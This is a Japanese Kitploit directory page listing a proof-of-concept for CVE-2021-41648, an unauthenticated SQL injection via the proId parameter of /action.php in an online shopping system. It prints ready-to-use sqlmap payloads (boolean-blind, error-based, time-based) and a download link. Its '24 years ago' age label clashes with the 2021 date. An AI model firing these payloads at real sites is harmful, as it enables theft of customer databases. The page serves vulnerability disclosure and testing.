Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-41648 — オンラインショッピングシステムのproIdパラメータを介した未認証SQLインジェクションの概念実証エクスプロイト。MySQLデータベースからのデータ抽出を可能にします。 | Kitploit
ツール/GitHubGitHub/mobiusbinary/cve-2021-41648
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubmobiusbinary/cve-2021-41648

CVE-2021-41648

オンラインショッピングシステムのproIdパラメータを介した未認証SQLインジェクションの概念実証エクスプロイト。MySQLデータベースからのデータ抽出を可能にします。

リポジトリを見る
24年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-41648

CVE-2021-41648 オンラインショッピングシステムにおけるSQLインジェクション

online-shopping-system は、認証なしのエラーベース/ブールベースのブラインドSQLインジェクションおよびエラーベースのSQLインジェクション攻撃に対して脆弱です。

/action.php ページの proId パラメータはユーザー入力をサニタイズしていないため、攻撃者は基盤となるMySQLデータベースから機密データを抽出できます。

アプリケーションへのリンク

online-shopping-system

影響を受けるコンポーネントとパラメータ

URL: /action.php
PARAMETER: proId

PoC

SQLMAP ペイロード

/action.php ページの proId パラメータ

Parameter: proId (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment) Payload: proId=61 OR 17-7=10' OR NOT 4774=4774#&addToCart=1

Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: proId=61 OR 17-7=10' OR (SELECT 6869 FROM(SELECT COUNT(*),CONCAT(0x717a716271,(SELECT (ELT(6869=6869,1))),0x716a627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- gfTu&addToCart=1

Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: proId=61 OR 17-7=10' AND (SELECT 2990 FROM (SELECT(SLEEP(5)))YhWy)-- xWNo&addToCart=1

PoC画像が不明瞭な場合は、より良い解像度で読み込まれるGIFをクリックしてください。

POC - proId

発見者

Jason Colyvas
MOBIUSBINARY
2021年9月21日

ツールをダウンロード